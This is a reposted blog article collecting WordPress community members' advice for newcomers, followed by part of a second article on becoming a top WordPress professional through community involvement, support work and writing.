BlogmyQuery – BMQ

We’ve all been total newbies. In fact, I spend most of my time still feeling like one. So researching this article was a great opportunity for me to do some more learning, and to share all of that good stuff with you.

I reached out to people from across the WordPress community to ask what advice they would give to people just starting their WordPress journey. I talked with developers, designers, support reps, security experts, hosting companies, theme shops, plugin developers and just about everything in between.

This article is a result of their insight, and I hope that it provides some encouragement and guidance to newbies — whether you’re a user or a developer — as well as some tips for advanced WordPress users who continue to learn throughout their lives. With that in mind: WordPress community, take it away!

Get Involved With The Community

WordPress has a tight community with active contributors from all over the world, so it’s no surprise that a bunch of people within that community recommended newbies start chatting with others. Having a desire to learn and get help will get you far. As Japh Thomson pointed out:

“There’s a lot to learn, and this is the best way to ensure you’re learning the right way to do things. It also means that as you learn, you can give back, which helps the community to grow. As you give back, you’ll find this actually helps you learn even more!

Being a part of the WordPress community is a mutually beneficial arrangement, and a fantastic way to build your skills and experience.”

There are plenty of places to get involved. If you’re a developer you could check out the weekly WordPress core developer chats on the #wordpress-dev channel on the freenode IRC (Internet Relay Chat) network. Just listening to what’s going on in the chat will help you to understand the direction of the codebase and the decisions that have been made. You’ll also learn who is doing the talking, i.e. who the project leaders are.

WordPress community members chatting at the WordPress community summit. (Image source: Andrea R)

When Brad Williams started out with WordPress, he just hung out in the #wordpress chat. Within a few months he went from asking questions to answering them, and made some new friends while he was at it.

If IRC isn’t for you, sign up for WordPress.org and use the Codex and the forums to start learning. While you’re there, you can help out by fixing any problems that you see in the Codex, or replying to support forum questions that you might know the answer to.

You can also follow WordPress people on Twitter, comment on blogs and go to WordCamps and Meetups. “Being a part of that conversation,” says Kailey Lampert, “is vital to anyone who wants to learn.”

Take the time to learn who is who in the WordPress community. As Remkus de Vries says:

“The most important thing is to check your surroundings. You can’t enter a community without knowing who the key players are and what the rules are. Learning that is also learning WordPress. No matter what you’d like to get out of the community, you have to be willing to put the time in there without expecting anything monetary in return. Think of it as earning your ‘street cred.’ The more you make yourself visible, and there’s lots of ways to do that, the better you’re helping yourself and the project.”

As a developer, you can get involved by open-sourcing your software and distributing it. This could involve writing a plugin or a theme and putting it on the WordPress repository or GitHub. “Not only will you gain the respect of other developers and community members, you’ll learn so much about what it means to be part of the WordPress community,” says Drew Strojny. “You’ll get feedback and ideas to help improve whatever you built or contributed and you’ll likely learn something along the way.”

Simon Wheatley pointed out that there is space for everyone in the WordPress community:

“If you are a developer, look out for places you can start to get involved in code contributions to plugins or to core WordPress. If you are a business person or you are using WordPress, look for opportunities to get involved in local events and meet other users. The more contact you have with the community, the better your experience will be. WordPress is written by people who see something they want to improve and get involved with the code, WordCamps and meet ups are organized by people who see a gap and get involved in helping improve the community, documentation is written by people who don’t understand something and get involved in creating explanations… getting the idea? Get involved!”

The other great thing about getting involved is that you’ll make friends and create a support network, which means if things do go wrong in the future, there’ll be people around who can help you out.

Thanks for input from: Japheth Thomson, Mason James, Eric Mann, Kailey Lampert, Dre Armeda, Ronnie Burt, Simon Wheatley, Jared Atchison, Brad Williams and Remkus de Vries.

Learn

By far, the most common advice that I was given for beginners was based around learning. This encompasses everything from setting up your first WordPress website to starting out with developing for WordPress. Learning is your first step to becoming a pro in WordPress, whatever your area.

Ben Balter points out that WordPress has its own way of doing things:

“There’s the computer-sciencey way (formal MVC, elegance on paper), and then there’s the WordPress way (think actions/filters, the loop). It’s a lot more intuitive in many ways, but if you’ve been trained the wrong way, it could take a minute or two to unlearn. WordPress purposely breaks certain formal design patterns, and almost always walks away with a solution that is more elegant for the user AND the developer.”

If you’re a developer coming to WordPress for the first time, you might wonder why WordPress does things in such a WordPressy way. Once you dig deeper you will start to find it enjoyable!

Image source: opensourceway.

And if you’re coming to WordPress for the first time to build yourself a website, Jan Dembowski has this great advice:

“Don’t be intimidated. Once you have gotten your own installation of WordPress software running, understand that the magic happens via the PHP files and possibly mod_rewrite’s .htaccess rules.

Everything hitting a WordPress installation starts with a Web request, gets processed and data gets pulled from or inserted into the database. Poof! The Web page is generated. All you had to do was sign in, publish a post and suddenly you’re publishing on the internet.

If you don’t know how it all works that can be intimidating especially if something is not working the way you thought it would.”

Don’t be Afraid to Experiment

“One of the best ways to get familiar with a new product is to tinker,” says Collis Ta’eed. Sometimes the best way to learn is to take stuff apart and put it back together, to break things and to be forced to fix them.

You should take Andrea Rennick’s advice to both users and developers to “be fearless!” Even if everything goes totally wrong, you can install a new copy of WordPress and start again.

Or, as Helen Hou-Sandi says:

“Be curious about what’s out there and don’t be afraid to figure it out for yourself. Whether that means figuring out how to get a test or playground site up and running somewhere so you can try out themes and plugins without worrying about your live site, or actually reading through the code of some of those themes and plugins to see how it’s done (or shouldn’t be done), don’t get stuck in ruts or consider the first thing you read to be gospel. It’s kind of like saying ‘do your research,’ but think of it more as encouraging curiosity rather than doing homework. In the long run, you’ll know more, and who knows — maybe you can even help somebody out who’s now in your former shoes!”

If you want to truly get rid of your inhibitions, learn how to install a local development environment. Michael Krapf suggests that your first WordPress website should be a testing playground. There are plenty of tools out there that you can use to get set up. Try out installing WordPress with MAMP on your Mac or with XAMPP on Windows. Kurt Payne recommends trying out ServerPress Desktop Server.

Don’t be afraid to experiment! (Image source: opensourceway)

Add content to your website and manipulate it. Try out themes and plugins. If you’re a developer you can create themes and plugins. You’ll be able to take your time troubleshooting without worrying about having taken your website down.

If you’re starting out in development, Pippin Williamson has this advice:

“Just build something. Too many beginning developers get caught up with trying to make sure they do it right the first time, but that isn’t that important when you first start. Everyone makes mistakes, and you learn a heck of a lot faster from your mistakes than you do from attempting to learn how to do it perfect the first time.”

Remember that the scope of things that people do with WordPress is changing. Jake Goldman points out that the 2012 WordPress survey highlighted the content management system (CMS) as the most dominant use case, but that WordPress as an “app engine” is the greatest area of growth. “Other tools might offer a better fit,” he says, “but I’ll guarantee WordPress is a capable contender. Frame the way you think about WordPress in the context of a rich ‘framework’ for building great Web applications with an out-of-the-box CMS configuration, take the time to really understand its architecture, and challenge yourself to apply WordPress to challenges way outside of the box. You’ll open up a whole new world.”

Thanks for input from: Pippin Williamson, Collis Ta’eed, Marko Heijnen, Andrea Rennick, Paul Hughes, Andy Stratton, Helen Hou-Sandi, Michael Krapf and Kurt Payne.

Read

The internet has so much information out there that it can be difficult to know where to start looking. A great place is WordPress.org. Both the forums and the Codex are great resources for learning and understanding how WordPress works. Catia Kitahara started using WordPress after a recommendation from someone on a mailing list. The first place she looked for help was the Codex. Before you start asking questions of people, have a look in the Codex and the forums to see if there is already a solution.

And there is plenty of advice outside of the Codex. The internet is full of WordPress tutorials that will help you to achieve your goals. A word of caution though: If you find a tutorial or code snippet, check the date of the post. WordPress has a fast release cycle, and a lot changes over the years. The post may still be entirely legitimate, but some will be out-of-date and may cause you confusion.

As a documentation writer, I know how little people actually read the things I write, and if the documentation actually got read people would find themselves in much less trouble. I’m not the only person aware of this.

As Joshua Strebel says:

“The old joke that people don’t read, and that they read instructions even less, is as true as it has ever been. You can do your part and make the WordPress world a better place by becoming a savvy user that wants to understand and learn versus the type that refuses to think and just wants things done for them.

We have found in our business that encouraging and guiding the customer to digest the support information we have provided and educating them on not just the How but also the Why, leads to a more satisfied and happy user. Once the unknown becomes known, everyone is happier.”

Thanks for input from: Eric Mann, Joshua Strebel, Slobodan Manic and Cátia Kitahara.

Write

You learn best when you are explaining what you do to other people. It’s a well-worn saying, but true nevertheless. You may have lots of knowledge on a specific subject, but can you break it down and explain it to other people? Once you’ve done that, you know that you’ve really got a grasp on it yourself.

The first place you could start writing is on your blog. If you’ve discovered a solution to a WordPress problem, write about it and share it with the world. This way you’re helping out people who have the same problem. It’s also a great thing that a blog has a feedback loop. If you’ve got something wrong, or if there is a better way to do it, someone will tell you.

Try out different ways to reach your goal. (Image source: opensourceway)

Brad Williams knows all about it:

“Some of my earlier WordPress posts were a big help to others and some were actually incorrect. What I learned from this is other WordPress developers would read my posts and correct any mistakes I might have made in my code samples. This actually made me more comfortable with releasing my code to the public because I realized the WordPress community ultimately just wants to help, not make fun of small coding mistakes.”

This is my own experience as well. Of course, if you get something wrong there may be people who get snarky with you, but largely the WordPress community wants to help you to improve. Good content on blogs benefits the entire community.

Once you’re comfortable with writing on your blog, why not try writing on the WordPress Codex. This is another place where you can test to see if you can make your ideas as clear in writing as they are in your head.

Thanks for input from: Brad Williams and me.

Learn the Basics

When it comes to theme development, Andy Stratton points out that he learned on default themes such as Classic and Kubrick, which were much simpler than the latest default — Twenty Twelve. Twenty Twelve shows off WordPress beautifully but it’s not the most useful tool for absolute beginners. Look for simpler themes to learn from, and learn by working through simple tasks. Here are some things Stratton suggests you try:

• Creating a theme that lists blog posts, has a single post template and page template;
• Implementing comments on a single post template;
• Implementing a custom output for comments;
• Implementing date, category and tag archives;
• Implementing a widgetized sidebar;
• Creating a custom widget;
• Create a child theme that does nothing;
• Create a child theme that changes how single posts are displayed.

“Tackling these challenges individually is similar to project management techniques of splitting larger tasks into more manageable pieces. You will learn more and start to relate how these things fit together. Eventually, you would have mind-mapped most of the template and theming structure for WordPress.”

Thanks for input from: Andy Stratton.

Read the Code

If you’re a developer, you shouldn’t just be looking at the Codex or online tutorials. These will get you started but they won’t provide you with everything you need to become an expert developer.

Alex King points out that “the documentation says what the code is supposed to do, while the code says what it actually does.” Documentation can lag behind the code, especially when core patches are merged. And while you’re poking around in the code, you may find other things that are immediately helpful and that you can file away for the future.

Image source: opensourceway.

When Konstantin Obenland started out with WordPress, he started out by looking at the code. He opened files and read them. This gave him an idea of what functions were available, how the APIs work and what was going on internally.

“The biggest challenge for me was to get an idea of where actions and filters were available and how I could alter behavior. Since they are what we work with to tweak core, I would encourage developers new to WordPress to grasp the concept of actions and filters and learn about which one to use in a given context.”

Thanks for input from: Alex King and Konstantin Obenland.

Other ways to learn

Other people had suggestions of different ways to learn:

• Stratton suggests that you get paid to learn by taking on new freelance projects that offer a little bit of new stuff for you to learn. Tell your client that it may take you a little longer and that it will require a learning curve. By the end of the project you’ll have been paid for a good job done, and you’ll have acquired a new skill.
• When he started to develop themes, Magnus Jepson learned by customizing free themes he liked instead of building from scratch. “I had basic knowledge of CSS/HTML and PHP before, but by looking at how other themes worked I gained knowledge and was able to build my first custom theme for a client.”
• Ryan Duff reminds you that “you also need to be receptive to comments and criticism. Talking to others online, whether it is in forums, IRC, etc… That networking and learning will allow you to discover early on the who, what, when, where and why of WordPress.”

Build

It’s great to learn, but it’s also fun to build. If you want your WordPress website to be sustainable and secure, it’s worth putting some planning and thought into what you’re going to do. If you’re building your first WordPress website, think about the design and the functionality that you want. If you’re a developer, take some time to actually understand what it is that you’re doing.

Here’s some advice from Mike Little:

“It is so easy to search the Web and find some code to copy into functions.php that’s supposed to do what you were looking for. But if you don’t understand it, you won’t be able to fix it if doesn’t quite work, or change it to make it work differently. Equally importantly, you will eventually learn to spot bad code from good, and there is a lot of bad code out there in the wild that unfortunately finds it’s way into people’s websites. I include in that statement code that used to be good code, but is now old and out-of-date. I see a lot of code implementing some functionality that got incorporated into core WordPress aeons ago (that’s at least a year in Internet Time).”

If you’re a user or developer, a little bit of understanding goes a very long way. Planning your website and taking things slowly will help you to learn and understand along the way. With that in mind, here’s some advice for building your website.

Take Things Slowly

When you’re building your first website, don’t just rush in and think you can master everything at once. “Starting a new blog can quickly become overwhelming,” says Rachel Baker. “Don’t try to master theme design, plugin development, SEO, community building and writing viral content before you even begin writing your first blog post. Set small achievable goals to stay focused and keep up momentum.”

Learn to go slowly.

Just because there are lots of different things that you can do with your blog doesn’t mean that you need to do them. Amy Hendrix suggests that you have a plan for what you want your website to be and design what you’re going to use based on that plan.

“There are a zillion themes and plugins for WordPress that can add all sorts of shiny widgets, gizmos and gadgets to your site,” says Dougal Campbell. “Your first priority is to make sure that your site is easy for your readers to use — if you add too much clutter it can detract from your message.”

Remember that your website is for delivering a message and you should always keep your audience in mind.

That said, you should plan to go big, suggests Mika Epstein:

“You start small, with a good foundation and make it solid. Build your site with thought. ‘If I use ugly permalinks now, what happens if I want to change it later?’ You can’t know the future, but you can make reasonable assumptions. Make a hard list of your needs and your wants and be absolutely brutal with yourself. You know the difference between a need (gas for the car) and a want (a new car, when yours runs just fine).”

Thanks for input from: Mika Epstein, Rachel Baker, Amy Hendrix and Dougal Campbell.

Choose your plugins and themes wisely

When you start out with WordPress, it is very easy to think “OMG IT’S FREE!”and then get overexcited by all of the free plugins and themes out there. It’s important to keep in mind that just because something is free, it doesn’t mean that it’s good. And equally important within WordPress is that just because something is commercial, that doesn’t mean it’s good either. There are plenty of powerful, secure, free WordPress themes and plugins, and plenty of poor quality commercial themes and plugins. Learn to distinguish between them.

“Don’t install crappy themes and plugins,” says Rarst. “If you are not confident to know which are good — don’t rush to install any straight away or get someone to help you with choosing.”

You should avoid using Google to search for free plugins and themes, and certainly avoid any torrent/warez websites offering commercial themes and plugins for free. Get what you need from reputable plugin and theme shops. Emil Uzlec notes that the ratings system in the WordPress repositories makes it much easier for you to make a choice about what you’re installing on your website.

Both Andrew Norcross and Mark Jaquith suggest that you put some thought into your selection of plugins. Norcross suggests that you focus on what you’re trying to achieve and then find the right tools to achieve that. A clear idea of what you need helps to sift through all of the tools out there.

And, as Jaquith points out, what you need could actually be in core. “Don’t go crazy and add every one you see that you think might be useful,” he says “Get to know the core software first before you add a bunch of stuff.”

Thanks for input from: Rarst, Andrew Norcross, Mark Jaquith, Emil Uzlec and Sinisa Komlenic.

Know Your WordPress

WordPress and WordPress.com are two different things. Cristi Burcu suggests that you learn the difference between WordPress.org and WordPress.com so that you can decide which one is right for you. In brief:

• WordPress is open source content management system for building and hosting a website on a Web server.
• WordPress.com is a network of blogs that runs on that software.

They are two different entities. If all you want is a blog and aren’t interested in setting up and controlling your own website, then it’s worth checking out WordPress.com.

“It’s free,” says Chris Wallace “and you don’t need to understand any of the technology behind it. In just five minutes, you can be up and running with a shiny new website which has loads of bells and whistles.”

If you want more than a blog, or you want more control, you can use WordPress, the software. When you install the software, you can install any plugins and themes that you want, and have much more control over your website. Plenty of hosts offer one-click installs of WordPress. You can sign up for hosting, click a button and WordPress will be installed via a script. Or, you can sign up for a managed WordPress host like Page.ly, ZippyKid or WP Engine, which come pre-installed with WordPress and specialize in WordPress hosting.

Vid Luther quotes Andrew Spittle, who said “don’t pay less than a shrimp dinner for hosting.”

Thanks for input from: Silviu-Cristian Burcă, Chris Wallace, Vid Luther and me.

Don’t Reinvent The Wheel

Whether you’re building your own themes, starting to build for clients, writing custom functionality or coding plugins, remember that there is a lot of code out there and, since we’re in the WordPress ecosystem, it’s all open source. A great time to start thinking about building upon someone else’s code is when you are building themes.

Christine Rondeau notes that “there are tons of starter themes out there from super stripped down to others full with custom options.” Find one that suits your needs and learn it inside out. This will make it much faster for you to code websites.

(Image source: Zen Sutherland)

This advice filters into any aspect of development. Timothy Wood recommends looking for things that have already been done and finding ways to improve on them.

“The community is full of solutions that are not completed, it is the iterations that improves the solution to be extensible. I believe part of WordPress’s weakness is that a hack is considered a solution because the end goal is the visual or deliverable for implementation. Often the (give back to) community is overlooked in favor of hacking to just get it done.”

By working with other people’s code, instead of in a vacuum, you can help them to improve and give back to the community.

Thanks for input from: Christine Rondeau and Timothy Wood.

Ask For Help

Everyone needs a little bit of help from time to time, and there’s no shame in asking for it.

“There’s no such thing as a dumb question. those of us who have been around a long time have pretty much seen all the questions people ask. We really would be happy to point you in the right direction. Don’t be scared, most of us do not bite.”

That’s from Andrea Rennick, who you’ll often find helping out on the WordPress.org support forums.

As well as the support forums, Syed Balkhi suggests trying WordPress Stack Exchange and Quora. He does mention, however, that these places are staffed by volunteers. People don’t get paid for their time so be nice and polite. Take the time to research your question beforehand. The volunteers will appreciate that you’ve taken the time to do so, and you’ll have a better experience overall. Just landing on a support forum and saying that your website is broken doesn’t help anyone.

And remember, once you’ve gotten help from other people, you can help out by answering questions from others. As Mario Peshev says, “doing support is one of the smoothest ways to gain know-how in a platform and be aware of the common questions and problems.”

Thanks for input from: Andrea Rennick, Mario Peshev and Syed Balkhi.

Find a Mentor

Frederick Townes says that starting a business in open source requires passion for solving a specific problem. He suggests that:

“Early on, make sure you identify mentors that can help you with various aspects of your business as it develops: secure and scalable code, marketing strategy, customer development and support, etc. Be transparent, communities and companies are made up of people, offline relationships make all the difference in not only understanding customer / community needs, but it’s also essential to keep things simple and master the art of creating value.”

Image source: opensourceway.

Finding a mentor will help you to feel less like you’re out on your own, and there’ll be someone there who can provide you with advice, whether that’s on the business or technical side of your business.

Thanks for input from: Frederick Townes.

Make Use Of The APIs

WordPress has a bunch of APIs built to make your life easier. Ryan Hellyer suggests that programmers avoid writing unneeded code logic as much as possible. WordPress has many ways of handling the internal logic and those who don’t use the APIs often end up doing things incorrectly.

Konstantin Koshenin gets into detail about how the APIs offer easy solutions:

“There’s a lot of code in WordPress that is designed to make your life easier. Don’t use cURL or file_get_contents, there’s the HTTP API (wp_remote_* functions). Don’t design your own jobs system, there’s WP_Cron. Don’t do AJAX requests to your PHP files and include wp-load.php, there’s a lot of great stuff to deal with remote requests. Don’t write your own rewrites engine, there’s the powerful WP_Rewrite API. Other APIs to learn: WP_Query, Options API, Transients API, Shortcodes API, (my favorite) Settings API, Caching APIs and the new Customizer and Media APIs.”

WordPress has a lot going on for you to make use of, so it’s crazy to start writing things for yourself before checking out what it has to offer. And as Aaron Campbell says, “reinventing the wheel is not only a waste of time, but more likely to break in the future.”

Thanks for input from: Konstantin Kovshenin, Ryan Hellyer and Aaron Campbell.

Find A Focus

Finding a focus is great advice for anyone who’s out to get work or make a career in the WordPress ecosystem. While there is a lot of work around, the people who do really well are those who find their niche and dominate it.

Boone Gorges points out that this could be a specific market, such as verticals like music or restaurant journalism ,or a technical focus on a specific aspect of WordPress — BuddyPress, Multisite or a specific framework. He says:

“Specialization has lots of benefits. You get to know your part of the codebase, making it faster to do new and interesting things. Getting your work done faster means making more money. Expertise leads to a better reputation, and reputations are easier to earn in a niche market. The better your reputation, the more you can charge. And if your focus is on one of the non-commercial parts of the WP ecosystem, like bbPress or BuddyPress, your expertise will make it possible to get involved in the free software project in ways that might be easier than cracking into WordPress core.”

This type of focus doesn’t apply only to developers. Tammie Lister is right when she says that the “WordPress world would suffer if we were all developers.” Find the thing that you’re good at and specialize in that area — the WordPress room has plenty of space for designers, writers, support pros, entrepreneurs, business people and all the other types who make up the WordPress ecosystem.

Thanks for input from: Boone Gorges and Tammie Lister.

Go To Events

WordCamps and Meetups, or any sort of WordPress event, are a great way to learn more about WordPress. WordCamps are normally large one or two day conferences, sometimes followed by a “hack day” or “dev day” during which developers get together to work on WordPress. They usually have some sort of social element where you can learn more about your WordPress peers.

(Image source: Stefano Coviello)

Meetups are smaller events. They are usually more regular, lasting a few hours with one or two speakers. While WordCamps often have people from all over a country, Meetups are usually focused on a specific local area. You can learn about WordCamps on WordCamp Central, or find some Meetups on Meetup.com.

Brad Williams recommends that developers go to events to meet other developers — he promises that they don’t bite (I will hold him to this promise).

Kim Gjerstad suggests that you find some people to have a beer with:

“It’s good to go out and meet other people and ask their opinion so if you can find a WordCamp or find a WordPress beer after hours, go out and meet people and talk to them. It’s a whole other level of learning when you meet people, and there is so much advice to be given.”

Thanks for input from: Kim Gjerstad and Brad Williams.

Final Words Of Wisdom

• If you want to read just one website for tips to get started with your blog, Paul Gibbs recommends reading WordPress.com’s Get Focused page.
• Seisuke Kuraishi says you should keep WordPress updated, as “this is the easiest way to keep your website secure and bug free.”
• If you’re a blogger, Eric Mann suggests that you reach out. “Blogging is never done in a vacuum.” Comment on other people’s blogs, respond to comments on your own and interact with the community.
• Another one for bloggers, this time from Vid Luther. Focus on your content. “People come to your website to read and consume what you have to say, interesting content is key. Anything else is bike shedding.”
• If you’re starting a WordPress business, start it based on something that you need, says Vladimir Prelovac. “For example a certain plugin functionality, theme niche or a specific service. This way, even if the business does not take off, you will at least satisfy your own need by building it.”

Conclusion

I want to finish this article with some excellent advice from Isaac Keyet. Isaac is the Mobile Group representative at WordPress.org. His advice is applicable to anyone:

“Just jump in. If you have an idea for a great blog or website, set something basic up quickly (there are good free or cheap WordPress hosts out there) and start writing. As you go, you’ll learn more about what works and what doesn’t, as well as what your readers like the most. There really is no time like now, and too many great ideas never see the light of day because their inventor didn’t take that first step.”

Jump in, get started, don’t be afraid and always feel that you can ask for help. The WordPress community is a pretty welcoming place. Find some of the people mentioned in this article and follow them on Twitter; they continue to come up with WordPress advice that you’ll be able to use as you continue your WordPress learning experience.

Hang out in the WordPress chat room, help out on the support forums, go to WordCamps and Meetups. Everyone starts out as a beginner, but with WordPress it’s easy to get far. All you need is a little bit of patience, commitment and enthusiasm. Eventually you’ll be the one offering the advice.

Got any advice of your own? Let us know in the comments!

(cp) (il)

---

© Siobhan McKeown for Smashing Magazine, 2013.

“First, let’s set a few things straight: becoming a top WordPress [developer professional] is hard work — very hard work. It’s going to take a lot of time, energy and determination. If you’re looking for an easy checklist or some “fast passâ€� to the top, you’re going to waste your time. Being one of the best is hard, and statistically speaking, the odds are stacked against you.”

If you’re a regular reader of Smashing Magazine, that will no doubt sound familiar to you. A few weeks back, Jonathan Wold wrote a post on how to be a top WordPress developer. But development isn’t the only way to get ahead in WordPress, because one of the great things about it is that you don’t need to be a developer or an expert. You just need a passion for WordPress, for open-source software and for being part of a community.

Image Credit: @cdharrison

In this article, I’m going to take a look at how you can be a top WordPress professional — this advice could apply to developers, but equally to bloggers, support reps, designers and everyone in between.

But why bother with WordPress in the first place? Cory Miller is the co-founder of iThemes, which offers professional WordPress themes, plugins and Web design training. He’s also the co-author of the latest edition of WordPress for Dummies. Miller started a blog with WordPress in 2006, as a total newbie with no WordPress experience, who started to learn by releasing free themes to the community. I asked him why people should get involved with WordPress.

“With WordPress you’re not sleeping on someone else’s couch. It’s open-source software that you control. You can do whatever you want with it, whenever you want. You’re not reliant on someone else’s stupid terms of services changes, or that you can’t touch the code because it’s locked away on someone else’s servers. I think we take for granted that freedom too often, or maybe forget it when the next [insert hot social media platform] rises up.

But the biggest reason for being involved with WordPress is it just makes Web publishing easy. Virtually anyone can have a blog or website on the Web with WordPress. And that opens up some amazing opportunities for everyone involved.”

WordPress makes it easy for people to publish a blog or website; it democratizes Web publishing. And its ease of use also makes it possible for people who aren’t PHP geniuses to make it to the top.

Why Be A Top WordPress Professional?

The sky is the limit with WordPress. (Image: stefanorugolo)

Being average and normal is underrated. You can’t be the best at everything, and if you spend your life trying to be, you could end up with a horrible neurosis. Besides, it can be nice to be just okay at something and accept that you’re okay at it — those things tend to have less stress associated with them. That said, it can be satisfying to strive to be better at the things that you’re passionate about, and whether that’s WordPress itself or the idea of taking control of your own destiny and running your own business, aiming for the top has a bunch of fringe benefits. For instance, the top WordPress professionals:

• Make the most money
  If you want to make the most money, you need to be the best at what you do, whether that’s writing, training, supporting, launching startups or project management. If you’re good, your reputation will grow and you’ll be able to get higher rates. Check out this eBook from Code Poet with advice from top WordPress professionals on getting your pricing right.
• Get the best clients
  As Wold pointed out in his article, once you get to the top you have a lot more freedom about what you say “yes” to. I’d like to add that as your rates start increasing, you’ll find that clients are increasingly easy to deal with. Charging more = better clients.
• Have the most influence
  If you’re passionate about open-source software and WordPress itself, building your reputation means more opportunity to have influence.
• Be part of a community
  The WordPress community is huge and growing. By taking part in that community and building a reputation for what you do, you’ll make connections with other people who are passionate about WordPress and who are at the top of their game. You don’t need to be the best developer to make it in WordPress, but it helps to make connections with them.
• Make the right connections
  If you build your reputation in the WordPress community by contributing back, going to WordCamps and Meetups and generally getting involved, people will start to take notice of who you are. Once you’re on a person’s radar, work will be sent your way.

I’m Not A Developer! What Can I Do?

You do not need to know how to write code to get ahead in WordPress. If the only people involved in WordPress were developers, then WordPress wouldn’t be the software that it is today. Here are some of the things you can do:

• Designer
• Project Manager
• Entrepreneur
• Support Pro
• Consultant
• Blogger
• Documentation Writer
• Teaching & Training

If you aren’t convinced that you can make it doing these things, check out my post on the WordPress Economy to scope out some of the people who are already doing it.

A great example of this is Mika Epstein (more commonly known as Ipstenu). For her, WordPress started out as a hobby but it quickly became more rewarding than her IT job at a bank where she did everything from application installs on desktops to deployment automation and monitoring for servers. Recently, though, she’s started a job as a support specialist for DreamHost.

Epstein is also the support representative for WordPress, leading up the support and documentation teams on WordPress.org. This has involved talking to hosting companies and theme/plugin shops about what is expected from them on the support forums. She’s responsible for the Supporting Everything WordPress blog, wrangling people into editing, helping out and supporting other supporters.

Epstein is just one of the people who I’ll be talking to who are at the top of the WordPress game but who wouldn’t be simply categorized as a developer.

Starting Out

To be a top WordPress professional, you don’t need to be able to write PHP, know how to query a MySQL database or know how to schedule a cron job. The WordPress ecosystem is vast, and there is room for lots of different specialties. However, if you are going to be a top WordPress professional, you should at least know how WordPress works, have a good imagination and become an expert in some area of it.

Use WordPress

It may seem self-evident, but using WordPress for yourself is a great place to start. This could be publishing your own personal blog or building a website for a friend or family member. Find a way to use WordPress. It’s a little crazy to start out deciding you want to get to the top of something when you’ve never experienced that product from perspective of the user.

“You’re involved with WordPress the minute you use it for yourself. That’s the beauty of open-source software and community. Your initiation into it is your ‘Hello World!’ or your first website and blog post with it.

So just start blogging and fall in love with it like I did 7 years ago.”

- Cory Miller

Install WordPress Locally

Use MAMP to install WordPress on your computer.

You don’t need to be a developer to set up a development environment on your computer. It may seem daunting. I remember that the first time I set up Xampp with WordPress, I was totally confused and had no idea what I was doing. I muddled through it eventually and was amazed that it was something I could do. Now I have more local WordPress installations than I can keep track of. Installing WordPress on your computer means you can do whatever you want with it, without having to worry about a live server. You can break it, hack themes and plugins, install whatever you want and you don’t need to worry about domain names, production websites, etc. I run local installations for specific plugins such as bbPress and BuddyPress, which allows me to explore working on websites in different contexts. Once you’ve installed WordPress a few times on your computer, you’ll realize how remarkably simple it is. Tutorials: install WordPress using Xampp (Windows) or MAMP (Mac)

Follow the Blogs

There are a plethora of WordPress blogs out there that you can learn from. Add them to your RSS reader and stay up-to-date. With so many blogs that have “WP” as a prefix, it may seem like they all have the same thing to offer, but the best are distinctive and each offers something unique. Here are some of my favorites:

• Smashing Magazine (WordPress Category)
  Long form articles, tutorials and editorials
• WP Realm
  International WordPress news, opinion and articles from experts across the community (and edited by me!)
• WPCandy
  WordPress news and podcasts. There’s also a Pros section which you can sign up for once you’re a Pro!
• WPBeginner
  WordPress tutorials, how-tos, videos and reviews, along with a nice coupon section for getting discounts on WordPress-related products and services.
• WPMU.org
  Daily tips, tutorials and WordPress news.
• WPLift
  Regular round-ups of WordPress plugins and themes, as well as the occasional tutorial.
• Code Poet
  Interviews with prominent WordPress experts, short and useful eBooks and links to useful resources.

It’s also worth signing up for wpMail.me which is a weekly email with WordPress articles from across the community.

Be Enthusiastic

A little bit of enthusiasm goes a long way. Mason James started out applying for a job as a WordPress developer at WPMU DEV, but he did a terrible job at the plugin modification task they gave him, and he was turned down for the job. However, they so appreciated his communication skills and positive attitude that they took him on as a supporter.

“Regardless of the industry, people want to work with someone they enjoy being around. Having a positive attitude and being willing to tackle challenges are both qualities any company is going to be looking for. I’m also passionate about supporting websites and seeing any problems resolved. I’m a natural problems solver — it’s like a game to me, so that fits in quite nicely.”

His enthusiasm has taken him a long way, and now Mason is CEO of his own WordPress support, management and project management agency, WP Valet.

Listen

It’s approaching 10 years since WordPress was born. That means that there are a lot of people in the WordPress community with lots of experience. There are people with experience running startups, managing support forums, building plugins or theme shops or contributing to WordPress itself. Find these people and listen to what they have to say. Dougal Campbell curates a Twitter list called WPLeaders, which is a great place to find people with WordPress experience.

Don’t just rush in with your awesome idea, making yourself look a little dumb in the process (though even that can be a good learning experience). Take the time to learn how the community works and functions, along with the etiquette, before you dive in.

Get Involved

People gathered at WordCamp Netherlands 2012. (Image: Erno Hannick)

Now that you have learned the basics of WordPress, it’s time to start getting involved. Of course, you could go it alone, and there are plenty of people running successful WordPress businesses who have nothing to do with the community. But there are so many reasons to get involved that you should jump straight in. Here’s why.

• The community provides a free training ground where experts will give you feedback and help you to make WordPress better.
• If you’re freelancing or running your own business, the WordPress community can provide support and human connections in what can be an isolating situation.
• By getting involved with WordPress, you’re helping to create a better product which everyone can benefit from.

Follow Make WordPress.org

Make WordPress.org is where you can find blogs for all the contributor groups.

Where there used to be mailing lists, now there are blogs. All of the different contributor groups are gathered together at Make WordPress.org. You can follow all of them or check out the ones that are relevant to you. The Make WordPress.org blogs are:

• Core
• Plugins
• Accessibility
• Support (including support forums and docs)
• UI
• Themes
• Polyglots
• Events
• Systems

There is something for everyone, and each blog has a vibrant community working in their area to make WordPress better. Each group has its own lead who is responsible for shepherding, wrangling and leading the team.

Support Others

The WordPress support forums are an excellent resource for WordPress users, but they’re also a great place for you to hone your WordPress skills. We learn best by teaching things to other people. I have learned 95% of what I know about WordPress from writing articles about it. Equally, answering questions in the support forums will help to clarify your own knowledge of WordPress. When you an explain a concept clearly to someone else, you know that you’ve got it — answering support questions is a great tool for that.

And not only will it help to clarify your own thinking, but it introduces you to different perspectives. Here’s Epstein:

“If you want to learn about WordPress, there is no faster way to figure out the nitty gritty than to try to help people. You can only imagine what you can dream up, but the millions of users out there come to this from a totally different place, and they have myriad different ideas. Bar none, I learned more about WordPress by helping than I did by ‘researching.’ Being asked a question and not knowing the answer means you have a goal you never would have given yourself, and it’s inspiring.”

Check out Epstein at the recent WordCamp San Francisco talking about getting involved in the WordPress support forums.

Write About WordPress

You could start off writing about WordPress by heading to the WordPress Codex, finding a random page that needs to be edited and editing it. The Codex is run on MediaWiki, and anyone with a WordPress.org username can edit it. The Codex is always in need of updating and editing, and contributing your own articles will help to hone your WordPress skills. You could also help out with the WordPress user handbook, which is currently in the process of being edited at the Supporting Everything WordPress blog.

